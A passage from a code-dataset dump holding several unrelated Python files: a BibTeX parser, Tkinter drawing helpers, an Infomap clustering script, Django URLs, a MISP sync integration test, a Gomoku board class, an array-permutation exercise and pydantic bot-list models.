in item1.keys()):\n author_name = item1['author'].split(',')\n # print(\"authors is: \", author_name)\n if ('year' in item1.keys()):\n year = item1['year'].split(',')\n # print(\"year is: \", year)\n if ('title' in item1.keys()):\n title = item1['title']\n # print(\"title is: \",title)\n if ('journal' in item1.keys()):\n journals = item1['journal'].split(',')\n # print(\"journals is: \", journals)\n pages = \"\"\n if ('pages' in item1.keys()):\n pages = item1['pages']\n # print(\"pages is: \",pages)\n volume = \"\"\n if ('volume' in item1.keys()):\n volume = item1['volume']\n # print(\"volume is: \",volume)\n numbers = \"\"\n if ('number' in item1.keys()):\n numbers = item1['number']\n # print(\"numbers is: \",numbers)\n doi = \"\"\n if ('doi' in item1.keys()):\n doi = item1['doi']\n # print(\"doi is: \",doi)\n pmid = \"\"\n if ('pmid' in item1.keys()):\n pmid = item1['pmid']\n # print(\"pmid is: \",pmid)\n ID = \"\"\n if ('ID' in item1.keys()):\n ID = item1['ID']\n # print(\"pmid is: \",pmid)\n\n # dedicate extra fields to others field\n others_key = list(set(item1.keys()) - set(['author','year','title', 'journal','pages','volume','number','doi','pmid','ID', 'ENTRYTYPE']))\n temp_other = {}\n for item_key in others_key:\n temp_other[item_key] = item1[item_key]\n others = str(temp_other)\n # print(\"other is: \", others)\n\n # ref_id , ref_bibtex , author_name , year , title , others , journals );\n dic_temp['ref_id'] = ref_id\n dic_temp['ref_bibtex'] = ref_bibtex\n dic_temp['author_name'] = author_name\n dic_temp['year'] = year\n dic_temp['title'] = title\n dic_temp['pages'] = pages\n dic_temp['volume'] = volume\n dic_temp['numbers'] = numbers\n dic_temp['doi'] = doi\n dic_temp['pmid'] = pmid\n dic_temp['ID'] = ID\n dic_temp['journals'] = journals\n dic_temp['others'] = others\n\n\n return dic_temp\n\ndef main_func():\n logf = open(LOG, \"a\")\n # select in database\n conn = psycopg2.connect(conString)\n cur = conn.cursor()\n refid2 = 0\n try:\n # call function --> insert_into_SSOAR_references\n lsofRecords = select_data(conn, cur)\n\n Max_rec = len(lsofRecords)\n print(\"number of recordes is : {}\".format(Max_rec))\n\n t0 = time.time()\n row = 0\n for item0 in lsofRecords:\n print(\"==================================================================\")\n print(\"row is : \", row)\n # pars\n dic_for_insert = bibtex_parser(lsofRecords[row])\n # insert\n # es_newmodel_bibtexes_20171020(conn, cur, dic_for_insert)\n row = row + 1\n t1 = time.time()\n total = t1 - t0\n print(\"pars and insert in table process Time : \", total)\n\n\n\n except Exception as e:\n Error = str(e.args)\n logf.write(\"Error: {0}, {1}, ref_id {2},{3} \\n\".format(str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time()), str(row), Error))\n print(e.args)\n\nif __name__ == \"__main__\":\n main_func()","sub_path":"python/ParsBibTex/FullPars.py","file_name":"FullPars.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386347916","text":"import numpy as np\n\n\ndef circle(canvas, center, radius, state_circle, background_circle, outline_circle):\n \"\"\"\n This function creates a circle item in the canvas.\n\n :param canvas: Canvas where the circle will be created\n :type canvas: tkinter.Canvas\n :param center: Coordinates of the circle's center in the Canvas\n :type center: tuple\n :param radius: Corresponds to the radius of the circle\n :type radius: int\n :param state_circle: Displays the circle's item if it takes True\n :type state_circle: boolean\n :param background_circle: Color of the circle's background\n :type background_circle: str\n :param outline_circle: Color of the circle's line\n :type outline_circle: str\n :return: Returns the Canvas widget\n :rtype: tkinter.Canvas\n \"\"\"\n if (state_circle):\n xC, yC = center\n A = (xC-radius, yC-radius)\n B = (xC+radius, yC+radius)\n canvas.create_oval(A, B, width=1, fill=background_circle,\n outline=outline_circle)\n return canvas\n\n\ndef coord(x, y, a, b):\n \"\"\"\n Gives the coordinates to change the landmark for one point (integer\n numbers).\n\n :return: Returns coordinates of one point in the Canvas landmark\n :rtype: tuple\n :Example:\n \\n\n >>> coord(200,200,40,60)\n (260,160)\n \"\"\"\n return(x+b, y-a)\n\n\ndef angle_tab(radius, graph):\n \"\"\"\n Returns a list of coordinates in the basic landmark which gives the\n coordinates of each vertex. Vertices are proportionally spaced\n (t = 2*pi/modulo number).\n\n :param radius: Radius of the circle\n :type radius: int\n :param graph: Graph object which gives the modulo number\n :type graph: multiplication_table.process_math.Graph.Graph\n :return: Returns a list of coordinates of all vertices\n :rtype: list\n \"\"\"\n t = (2*np.pi)/(graph.mod)\n angle = [None] * graph.mod*100\n for k in range(graph.mod*100):\n angle[k] = (radius*np.cos(k*t/100), radius*np.sin(k*t/100))\n return angle\n\n\ndef dot(canvas, graph, radius, center, color_graph, color_name):\n \"\"\"\n Adds the number of dots needed on the circle thanks to the\n :py:meth:`angle_tab` function. These points are proportionally spaced.\n Also, it calls :py:meth:`name_vertices` function which associates,\n for each dot, a number.\n\n :param canvas: Canvas where the dots items will be created\n :type canvas: tkinter.Canvas\n :param graph: Graph object which gives the modulo number \n :type graph: multiplication_table.process_math.Graph.Graph \n :param radius: Corresponds to the circle's radius\n :type radius: int\n :param center: Center of the circle in the Canvas\n :type center: int\n :param color_graph: List of colors to change the dots color\n :type color_graph: list\n :param color_name: Color of text items which represent the name of dots\n :type color_name: str\n :return: Returns the Canvas widget\n :rtype: tkinter.Canvas\n \"\"\"\n col = 0\n if (graph.mod <= 150):\n angle = angle_tab(radius, graph)\n for j in np.arange(0, len(angle), 100):\n a, b = angle[j]\n A = coord(center-3, center-3, a, b)\n B = coord(center+3, center+3, a, b)\n # create modulo_number circles (R=3)\n canvas.create_oval(A, B, fill=color_graph[col])\n col = (col + 1) % len(color_graph)\n name_vertices(canvas, radius, graph, center, color_name)\n return canvas\n\n\ndef name_vertices(cnv, radius, graph, center, color_name):\n \"\"\"\n Adds a name, for each vertex, around the circle.\n\n :param cnv: Canvas where the name will be added\n :type cnv: tkinter.Canvas\n :param radius: Corresponds to the circle's radius\n :type radius: int\n :param center: Center of the circle in the canvas\n :type center: int\n :param color_name: Color of text items\n :type color_name: str\n :return: Returns the Canvas widget\n :rtype: tkinter.Canvas\n \"\"\"\n angle = angle_tab(radius+17, graph)\n for j in np.arange(0, len(angle), 100):\n a, b = angle[j]\n Dots_C = (center+b, center-a)\n if (graph.mod <= 150):\n size = str(int(min(18, 16*62/graph.mod)))\n cnv.create_text(Dots_C, text=str(int(j/100)),\n font=\"Arial \" + size + \" bold\", fill=color_name)\n return cnv\n","sub_path":"package_table/build/lib/multiplication_table/process_vis/base_vis.py","file_name":"base_vis.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"551064722","text":"import numpy as np\nimport pandas as pd\nimport networkx as nx\nimport random\nimport time\nimport copy\nimport matplotlib.pyplot as plt\nimport scipy\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LinearRegression\nfrom xgboost import XGBClassifier\nfrom infomap import Infomap\n\n\nmanuTolabel={'SmartThings': 0, 'Amazone': 1, 'Netatmo': 2, 'TP-Link': 3, 'Samsung': 4, 'Google': 5, 'Insteon': 6, 'Withings': 7, 'Belkin': 8, 'Apple': 9, 'Nest': 10, 'Blipcare': 11, 'Lifx': 12, 'Triby': 13, 'Pixstar': 14, 'HP': 15}\n#usageTolabel\nmanuTolabel={'Computer': 0, 'Others': 1, 'Monitor': 2}\nMACTono={'d0:52:a8:00:67:5e': 0, '44:65:0d:56:cc:d3': 1, '70:ee:50:18:34:43': 2, 'f4:f2:6d:93:51:f1': 3, '00:16:6c:ab:6b:88': 4, '30:8c:fb:2f:e4:b2': 5, '00:62:6e:51:27:2e': 6, 'e8:ab:fa:19:de:4f': 7, '00:24:e4:11:18:a8': 8, 'ec:1a:59:79:f4:89': 9, '50:c7:bf:00:56:39': 10, '74:c6:3b:29:d7:1d': 11, 'ec:1a:59:83:28:11': 12, '18:b4:30:25:be:e4': 13, '70:ee:50:03:b8:ac': 14, '00:24:e4:1b:6f:96': 15, '74:6a:89:00:2e:25': 16, '00:24:e4:20:28:c6': 17, 'd0:73:d5:01:83:08': 18, '18:b7:9e:02:20:44': 19, 'e0:76:d0:33:bb:85': 20, '70:5a:0f:e4:9b:c0': 21, '08:21:ef:3b:fc:e3': 22, '30:8c:fb:b6:ea:45': 23, '40:f3:08:ff:1e:da': 24, '74:2f:68:81:69:42': 25, 'ac:bc:32:d4:6f:2f': 26, 'b4:ce:f6:a7:a3:c2': 27, 'd0:a6:37:df:a1:e1': 28, 'f4:5c:89:93:cc:85': 29, '14:cc:20:51:33:ea': 30}\nnoToMAC={v:k for k,v in MACTono.items()}\ndef shuffle(data,label): \n index = [i for i in range(len(data))] \n random.shuffle(index) \n data = data[index]\n label = label[index] \n return data,label\n\ndef predict(x):\n return np.round(cls.predict(x))\ndef getA(name):\n G=nx.read_gexf(name)\n A=nx.adjacency_matrix(G)\n A=np.array(A.toarray())\n A=A/np.linalg.norm(A,ord=2)\n labels=[]\n ct=0\n for n in G.nodes(data=True):\n manu=n[1]['manu']\n labels.append(manu)\n im=Infomap('--directed')\n for edge in G.edges(data='weight'):\n s=edge[0]\n t=edge[1]\n #print(s,t,edge[2])\n im.add_link(int(s),int(t),edge[2])\n im.run()\n temp=np.zeros(len(labels))\n for node_id,module_id in im.modules:\n temp[node_id]=module_id\n y=[]\n for node in G.nodes():\n y.append(temp[int(node)])\n return np.array(y),np.array(labels)\n\ndef matchpredict(y,labels):\n match=np.zeros((int(max(y))+1,max(labels)+1))\n for yy,ll in zip(y,labels):\n match[int(yy)][ll]+=1\n predicttotrue=np.zeros(match.shape[0])\n for i in range(predicttotrue.shape[0]):\n predicttotrue[i]=np.argmax(match[i])\n y_=np.zeros(y.shape[0])\n for i,yy in enumerate(y):\n y_[i]=predicttotrue[int(yy)]\n return y_\n\ndef calculate(y,labels):\n ct=0\n rt=0\n for i in range(labels.shape[0]-1):\n for j in range(i+1,labels.shape[0]):\n if (labels[i]==labels[j])==(y[i]==y[j]):\n rt+=1\n ct+=1\n return rt/ct\n\ny,labels=getA('org.gexf')\ny=matchpredict(y,labels)\nprint(calculate(y,labels))\nprint(y)\ny,labels=getA('new.gexf')\ny=matchpredict(y,labels)\nprint(calculate(y,labels))\nprint(y)\n","sub_path":"classify/Facebook/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"225531321","text":"from django.conf.urls import patterns, url\n\n\nurlpatterns = patterns('sponsors.views',\n url(r'^$', 'list_sponsors',\n name='sponsors_list_sponsors'),\n url(r'^view/(?P[-a-zA-Z0-9]+)/$', 'view_sponsor',\n name='sponsors_view_sponsor'),\n)\n\n","sub_path":"sponsors/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228367376","text":"from PymoNNto.Exploration.Network_UI.TabBase import *\n\n\nclass afferent_syn_attr_plot_tab(TabBase):\n\n def __init__(self, syn_vars, title='Aff Syn',timesteps=500):\n super().__init__(title)\n self.syn_vars=syn_vars\n self.timesteps=timesteps\n\n def add_recorder_variables(self, neuron_group, Network_UI):\n self.check={}\n for syn_var in self.syn_vars:\n self.check[syn_var] = True\n for syn in neuron_group.afferent_synapses[\"All\"]:\n if not hasattr(syn, syn_var):\n self.check[syn_var] = False\n if self.check[syn_var]:\n Network_UI.add_recording_variable(neuron_group, '[np.sum(s.'+syn_var+') for s in n.afferent_synapses[\"All\"]]', timesteps=self.timesteps)\n\n def initialize(self, Network_UI):\n self.weight_tab = Network_UI.Next_Tab(self.title)\n\n self.plots = {}\n for syn_var in self.syn_vars:\n _, syn_plt = Network_UI.Add_plot_curve('Neuron Group average ' + syn_var, return_plot=True, x_label='t (iterations)', y_label='Input')\n self.plots[syn_var] = syn_plt\n\n\n\n def update(self, Network_UI):\n if self.weight_tab.isVisible():\n\n group = Network_UI.selected_neuron_group()\n\n for syn_var in self.syn_vars:\n\n if self.check[syn_var]:\n\n self.plots[syn_var].clear()\n\n recorded = group['[np.sum(s.'+syn_var+') for s in n.afferent_synapses[\"All\"]]'][-self.timesteps:]\n iterations = group['n.iteration', 0, 'np'][-self.timesteps:]\n if len(recorded) > 0:\n inputs = np.array(recorded[0])\n ident=[s.src.group_without_subGroup() for s in group.afferent_synapses[\"All\"]]\n single_ident = list(set(ident))\n\n for i, si in enumerate(single_ident):\n mask = [id == si for id in ident]\n\n data = np.sum(inputs[:, mask], axis=1)\n curve = pg.PlotCurveItem(iterations, data, name='', pen=si.color)#self.slow_input_colors[i]\n self.plots[syn_var].addItem(curve)\n","sub_path":"Exploration/Network_UI/Advanced_Tabs/afferent_syn_attr_plot_tab.py","file_name":"afferent_syn_attr_plot_tab.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272423073","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport sys\nimport unittest\nimport subprocess\n\nimport urllib3\nimport logging\nlogging.disable(logging.CRITICAL)\n\ntry:\n from pymisp import ExpandedPyMISP, MISPOrganisation, MISPUser, MISPServer\nexcept ImportError:\n if sys.version_info < (3, 6):\n print('This test suite requires Python 3.6+, breaking.')\n sys.exit(0)\n else:\n raise\n\nkey = 'eYQdGTEWZJ8C2lm9EpnMqxQGwGiPNyoR75JvLdlE'\nverifycert = False\n\n\nurllib3.disable_warnings()\n\n'''\nStatic IP config\n\nauto eth1\niface eth1 inet static\naddress 192.168.1.XXX\nnetmask 255.255.255.0\nnetwork 192.168.1.0\nbroadcast 192.168.1.255\n'''\n\nmisp_instances = [\n {\n 'url': 'https://localhost:8643',\n 'external_baseurl': 'https://192.168.1.1',\n 'key': key,\n 'orgname': 'First org',\n 'email_admin': 'first@admin.local',\n 'email_user': 'first@user.local'\n },\n {\n 'url': 'https://localhost:8644',\n 'external_baseurl': 'https://192.168.1.2',\n 'key': key,\n 'orgname': 'Second org',\n 'email_admin': 'second@admin.local',\n 'email_user': 'second@user.local'\n },\n {\n 'url': 'https://localhost:8645',\n 'external_baseurl': 'https://192.168.1.3',\n 'key': key,\n 'orgname': 'Third org',\n 'email_admin': 'third@admin.local',\n 'email_user': 'third@user.local'\n },\n]\n\n# Assumes the VMs are already started, doesn't shut them down\nfast_mode = True\n\n\nclass MISPInstance():\n\n def __init__(self, params):\n self.site_admin_connector = ExpandedPyMISP(params['url'], params['key'], ssl=False, debug=False)\n # Set the default role (id 3 on the VM is normal user)\n self.site_admin_connector.set_default_role(3)\n if not fast_mode:\n # Git pull\n self.site_admin_connector.update_misp()\n # Load submodules\n self.site_admin_connector.update_object_templates()\n self.site_admin_connector.update_galaxies()\n self.site_admin_connector.update_noticelists()\n self.site_admin_connector.update_warninglists()\n self.site_admin_connector.update_taxonomies()\n\n self.site_admin_connector.toggle_global_pythonify()\n\n # Create organisation\n organisation = MISPOrganisation()\n organisation.name = params['orgname']\n self.test_org = self.site_admin_connector.add_organisation(organisation)\n print(self.test_org.name, self.test_org.uuid)\n # Create org admin\n user = MISPUser()\n user.email = params['email_admin']\n user.org_id = self.test_org.id\n user.role_id = 2 # Org admin\n self.test_admin = self.site_admin_connector.add_user(user)\n self.org_admin_connector = ExpandedPyMISP(params['url'], self.test_admin.authkey, ssl=False, debug=False)\n self.org_admin_connector.toggle_global_pythonify()\n # Create user\n user = MISPUser()\n user.email = params['email_user']\n user.org_id = self.test_org.id\n self.test_usr = self.org_admin_connector.add_user(user)\n self.usr_connector = ExpandedPyMISP(params['url'], self.test_admin.authkey, ssl=False, debug=False)\n self.usr_connector.toggle_global_pythonify()\n\n # Setup external_baseurl\n self.site_admin_connector.set_server_setting('MISP.external_baseurl', params['external_baseurl'], force=True)\n\n self.external_base_url = params['external_baseurl']\n self.sync = []\n\n def create_sync_user(self, organisation):\n sync_org = self.site_admin_connector.add_organisation(organisation)\n short_org_name = sync_org.name.lower().replace(' ', '-')\n user = MISPUser()\n user.email = f\"sync_user@{short_org_name}.local\"\n user.org_id = sync_org.id\n user.role_id = 5 # Org admin\n sync_user = self.site_admin_connector.add_user(user)\n self.sync.append((sync_org, sync_user, self.external_base_url))\n\n def create_sync_server(self, name, remote_url, authkey, organisation):\n server = MISPServer()\n server.name = name\n server.self_signed = True\n server.url = remote_url\n server.authkey = authkey\n server.remote_org_id = organisation.id\n server = self.site_admin_connector.add_server(server)\n r = self.site_admin_connector.test_server(server)\n print(r)\n\n def cleanup(self):\n for org, user, remote_url in self.sync:\n self.site_admin_connector.delete_user(user) # Delete user from other org\n self.site_admin_connector.delete_organisation(org)\n\n # Delete sync servers\n for server in self.site_admin_connector.servers():\n self.site_admin_connector.delete_server(server)\n\n # Delete users\n self.org_admin_connector.delete_user(self.test_usr.id)\n self.site_admin_connector.delete_user(self.test_admin.id)\n # Delete org\n self.site_admin_connector.delete_organisation(self.test_org.id)\n\n\nclass TestSync(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n if not fast_mode:\n subprocess.Popen(['VBoxHeadless', '-s', 'Test Sync 1'])\n subprocess.Popen(['VBoxHeadless', '-s', 'Test Sync 2'])\n subprocess.Popen(['VBoxHeadless', '-s', 'Test Sync 3'])\n time.sleep(30)\n cls.maxDiff = None\n cls.instances = []\n for misp_instance in misp_instances:\n mi = MISPInstance(misp_instance)\n cls.instances.append(mi)\n\n # Create all sync users\n test_orgs = [i.test_org for i in cls.instances]\n\n for instance in cls.instances:\n for test_org in test_orgs:\n if instance.test_org.name == test_org.name:\n continue\n instance.create_sync_user(test_org)\n\n # Create all sync links\n sync_identifiers = [i.sync for i in cls.instances]\n for instance in cls.instances:\n for sync_identifier in sync_identifiers:\n for org, user, remote_url in sync_identifier:\n if org.name != instance.test_org.name:\n continue\n instance.create_sync_server(name=f'Sync with {remote_url}',\n remote_url=remote_url,\n authkey=user.authkey,\n organisation=instance.test_org)\n\n @classmethod\n def tearDownClass(cls):\n for i in cls.instances:\n i.cleanup()\n if not fast_mode:\n subprocess.Popen(['VBoxManage', 'controlvm', 'Test Sync 1', 'poweroff'])\n subprocess.Popen(['VBoxManage', 'controlvm', 'Test Sync 2', 'poweroff'])\n subprocess.Popen(['VBoxManage', 'controlvm', 'Test Sync 3', 'poweroff'])\n time.sleep(20)\n subprocess.Popen(['VBoxManage', 'snapshot', 'Test Sync 1', 'restore', 'Snapshot 1'])\n subprocess.Popen(['VBoxManage', 'snapshot', 'Test Sync 2', 'restore', 'Snapshot 1'])\n subprocess.Popen(['VBoxManage', 'snapshot', 'Test Sync 3', 'restore', 'Snapshot 1'])\n\n def test_simple_sync(self):\n server = MISPServer()\n server.name = 'Second Instance'\n server.url = misp_instances[1]['external_baseurl']\n","sub_path":"tests/testlive_sync.py","file_name":"testlive_sync.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147733335","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.3-i386/egg/collective/lead/tests.py\n# Compiled at: 2008-04-27 07:30:45\nimport os, unittest, transaction, sqlalchemy as sa\nfrom sqlalchemy import orm, sql\nfrom collective.lead import Database, tx\nfrom collective.lead.interfaces import IDatabase, ITransactionAware\nfrom zope.component import provideAdapter, provideUtility, getUtility\nDB_NAME = 'collective.lead.tests.testlead'\nLeadDataManager = tx.ThreadlocalDatabaseDataManager\nprovideAdapter(tx.ThreadlocalDatabaseTransactions, adapts=(Database,), provides=ITransactionAware)\n\nclass SimpleModel(object):\n __module__ = __name__\n\n def __init__(self, **kw):\n for (k, v) in kw.items():\n setattr(self, k, v)\n\n def asDict(self):\n return dict((k.startswith('_') or (k, v) for (k, v) in self.__dict__.items()))\n\n\nclass User(SimpleModel):\n __module__ = __name__\n\n\nclass Skill(SimpleModel):\n __module__ = __name__\n\n\nclass TestDatabase(Database):\n __module__ = __name__\n _url = os.environ.get('TEST_DSN', 'sqlite:///test')\n\n def _setup_tables(self, metadata, tables):\n tables['test_users'] = sa.Table('test_users', metadata, sa.Column('id', sa.Integer, primary_key=True), sa.Column('firstname', sa.Text), sa.Column('lastname', sa.Text))\n tables['test_skills'] = sa.Table('test_skills', metadata, sa.Column('id', sa.Integer, primary_key=True), sa.Column('user_id', sa.Integer), sa.Column('name', sa.Text), sa.ForeignKeyConstraint(('user_id', ), ('test_users.id', )))\n\n def _setup_mappers(self, tables, mappers):\n mappers['test_users'] = orm.mapper(User, tables['test_users'], properties={'skills': orm.relation(Skill, primaryjoin=tables['test_users'].columns['id'] == tables['test_skills'].columns['user_id'])})\n mappers['test_skills'] = orm.mapper(Skill, tables['test_skills'])\n\n\ndef setup_db():\n db = TestDatabase()\n provideUtility(db, IDatabase, name=DB_NAME)\n\n\nsetup_db()\n\nclass LeadTests(unittest.TestCase):\n __module__ = __name__\n\n @property\n def db(self):\n return getUtility(IDatabase, name=DB_NAME)\n\n def setUp(self):\n pass\n\n def tearDown(self):\n transaction.abort()\n\n def testAAA(self):\n ignore = self.db.session\n self.db._metadata.drop_all()\n self.db._metadata.create_all()\n transaction.commit()\n\n def testzzz(self):\n self.db._metadata.drop_all()\n transaction.commit()\n\n def testSimplePopulation(self):\n session = self.db.session\n query = session.query(User)\n rows = query.all()\n self.assertEqual(len(rows), 0)\n session.save(User(id=1, firstname='udo', lastname='juergens'))\n session.save(User(id=2, firstname='heino', lastname='n/a'))\n session.flush()\n rows = query.order_by(query.table.c.id).all()\n self.assertEqual(len(rows), 2)\n row1 = rows[0]\n d = row1.asDict()\n self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})\n stmt = sql.select(query.table.columns).order_by('id')\n results = self.db.connection.execute(stmt)\n self.assertEqual(results.fetchall(), [(1, 'udo', 'juergens'), (2, 'heino', 'n/a')])\n transaction.abort()\n self.db._metadata.create_all()\n results = self.db.connection.execute(stmt)\n self.assertEqual(results.fetchall(), [])\n\n def testXXRelations(self):\n session = self.db.session\n session.save(User(id=1, firstname='foo', lastname='bar'))\n user = session.query(User).filter_by(firstname='foo')[0]\n user.skills.append(Skill(id=1, name='Zope'))\n session.flush()\n\n def testTransactionJoining(self):\n transaction.abort()\n t = transaction.get()\n self.failIf([ r for r in t._resources if r.__class__ is LeadDataManager ], 'Joined transaction too early')\n ignore = self.db.session\n self.failUnless([ r for r in t._resources if r.__class__ is LeadDataManager ], 'Not joined transaction')\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(LeadTests))\n return suite","sub_path":"pycfiles/collective.leadmedia-0.1.tar/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644422914","text":"class GameBoard:\n \n def __init__(self, rows, columns):\n self.rows = rows\n self.columns = columns\n self.board = [[0 for j in range(columns)] for i in range(rows)]\n \n def get_board(self):\n return self.board\n \n def get_rows(self):\n return self.rows\n \n def get_columns(self):\n return self.columns\n \n def move(self, coords, player):\n row = coords[0]\n column = coords[1]\n if row in range(self.rows) and column in range(self.columns) and self.board[row][column] == 0:\n self.board[row][column] = player\n return True\n else:\n return False\n \n def check_winner(self):\n lines = []\n symbols = [\" \", \"w\", \"b\"]\n for i in range(self.rows):\n row, col, dd1, dd2, du1, du2 = \"\", \"\", \"\", \"\", \"\", \"\"\n for j in range(self.columns):\n row += symbols[self.board[i][j]]\n col += symbols[self.board[j][i]]\n if i + j >= 0 and i + j < self.rows:\n dd1 += symbols[self.board[i + j][j]]\n du1 += symbols[self.board[self.rows - 1 - i - j][j]]\n if i != 0:\n dd2 += symbols[self.board[j][i + j]]\n du2 += symbols[self.board[self.rows - 1 - j][i + j]]\n lines.extend((row, col, dd1, dd2, du1, du2))\n for line in lines:\n if \"wwwww\" in line:\n return 1\n if \"bbbbb\" in line:\n return -1\n tie = True\n for row in self.board:\n if 0 in row:\n tie = False\n if tie:\n return 2\n return 0\n \n def get_winning_line(self, last_move):\n row = last_move[0]\n col = last_move[1]\n player = self.board[row][col]\n endsquare = None\n #check row\n rowcounter = 0\n colcounter = 0\n d1counter = 0\n d2counter = 0\n cexists = False\n rexists = False\n for i in range(-4, 5):\n if col + i >= 0 and col + i < len(self.board):\n cexists = True\n if self.board[row][col+i] == player:\n rowcounter += 1\n if rowcounter == 5:\n endsquare = (\"r\", (row, col+i))\n break\n else:\n rowcounter = 0\n else:\n cexists = False\n if row + i >= 0 and row + i < len(self.board):\n rexists = True\n if self.board[row + i][col] == player:\n colcounter += 1\n if colcounter == 5:\n endsquare = (\"c\", (row + i, col))\n break\n else:\n colcounter = 0\n else:\n rexists = False\n if rexists and cexists:\n if self.board[row + i][col + i] == player:\n d1counter += 1\n if d1counter == 5:\n endsquare = (\"d1\", (row + i, col + i))\n break\n else:\n d1counter = 0\n if cexists and row - i >= 0 and row - i < len(self.board):\n if self.board[row - i][col + i] == player:\n d2counter += 1\n if d2counter == 5:\n endsquare = (\"d2\", (row - i, col + i))\n break\n else:\n d2counter = 0\n if endsquare[0] == \"r\":\n pos = endsquare[1][1]\n return [(row, x) for x in range(pos - 4, pos + 1)]\n elif endsquare[0] == \"c\":\n pos = endsquare[1][0]\n return [(x, col) for x in range(pos - 4, pos + 1)]\n elif endsquare[0] == \"d1\":\n r = endsquare[1][0]\n c = endsquare[1][1]\n return [(r + x, c + x) for x in range(-4, 1)]\n else:\n r = endsquare[1][0]\n c = endsquare[1][1]\n return [(r - x, c + x) for x in range(-4,1)]\n ","sub_path":"projekt/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436702731","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 29 18:36:04 2017\n\nEPI 6.13 Permute the elements of an array\n\nGiven an array A=[a,b,c,d] and a permutation array P=[2,0,1,3]\n\nIf we apply P to A, then we get A=[b, c, a, d]\n\nIt is simple to apply a permutation-array to a given array if additional storage\nis available to write the resulting array.\n\nGiven and array A of n elements and a permutation P, apply P to A using only\nconstant additional storage. Use A itself to store the result\n\n\"\"\"\n\ndef PermuteElementsOfArray_Naive(A, P):\n '''Uses O(n) additional space '''\n \n temp = [None]*len(A)\n \n for i, p in enumerate(P):\n temp[p] = A[i]\n \n return temp\n\n\ndef PermuteElementsOfArray_Partial(A, P):\n ''' Should use O(1) additional space '''\n \n N = len(A)\n \n for i in range(N):\n start_index = i\n next_index = P[start_index]\n \n curr_index = start_index \n curr = A[curr_index]\n nextv = A[next_index]\n \n \n while next_index != start_index:\n \n print('A: {} next_index: {}'.format(A, next_index))\n A[next_index] = curr\n next_index = P[next_index]\n\n \n curr = nextv\n nextv = A[next_index]\n\n A[next_index] = curr\n print('curr: {} nextv: {} next_index: {} A: {} P:{}'.format(curr, nextv, next_index, A, P))\n \n\n return A\n\ndef PermuteElementsOfArray(A, P):\n ''' Should use O(1) additional space '''\n \n N = len(A)\n \n# for i in range(1):\n for i in range(N):\n \n if not P[i]:\n continue\n \n start_index = i\n next_index = P[start_index]\n \n curr_index = start_index \n curr = A[curr_index]\n nextv = A[next_index]\n \n P[start_index] = None\n \n while next_index != start_index:\n \n print('A: {} next_index: {}'.format(A, next_index))\n A[next_index] = curr\n \n nextprev = next_index\n next_index = P[next_index]\n\n P[nextprev] = None\n \n curr = nextv\n nextv = A[next_index]\n\n A[next_index] = curr\n print('curr: {} nextv: {} next_index: {} A: {} P:{}'.format(curr, nextv, next_index, A, P))\n \n\n return A\n\ndef main():\n print('Permute elements of an array')\n \n# A, P = (['a', 'b', 'c', 'd'], [2, 0, 1, 3])\n# A, P = (['a', 'b', 'c', 'd'], [3, 2, 1, 0])\n A, P = (['a', 'b', 'c', 'd', 'e'], [2,3,4,0,1])\n A, P = (['a', 'b', 'c', 'd', 'e'], [2,1,0,3,4])\n\n res = PermuteElementsOfArray_Naive(A, P)\n print('A: {} P: {} --> Permuted Array: {}'.format(A, P, res))\n res2 = PermuteElementsOfArray(A, P)\n print('A: {} P: {} --> Permuted Array: {}'.format(A, P, res2))\n \n \n\nif __name__ == '__main__':\n main()\n","sub_path":"mulakat/EPI06_Arrays/permuteElementsOfArray.py","file_name":"permuteElementsOfArray.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"103050981","text":"import uuid\nfrom typing import List, Optional\n\nfrom pydantic import BaseModel, validator\n\nimport modules.models.enums as enums\n\nfrom ..base_models import APIResponse, BaseUser\n\nclass UserJSPatch(BaseModel):\n js_allowed: bool\n\nclass UserDescEdit(BaseModel):\n description: str\n \nclass BotMeta(BaseModel):\n \"\"\"\n Notes:\n\n - extra_owners must be a list of strings where the strings\n can be made a integer\n \"\"\"\n prefix: str\n library: str\n invite: str\n website: Optional[str] = None\n description: str\n banner_card: Optional[str] = None\n banner_page: Optional[str] = None\n keep_banner_decor: bool\n extra_owners: List[str] # List of strings that can be turned into a integer\n support: Optional[str] = None\n long_description: str\n css: Optional[str] = None\n long_description_type: enums.LongDescType\n nsfw: bool\n donate: Optional[str] = None\n privacy_policy: Optional[str] = None\n github: Optional[str] = None\n webhook_type: Optional[int] = 0\n webhook: Optional[str] = None\n webhook_secret: Optional[str] = None\n vanity: str\n features: List[str] = []\n 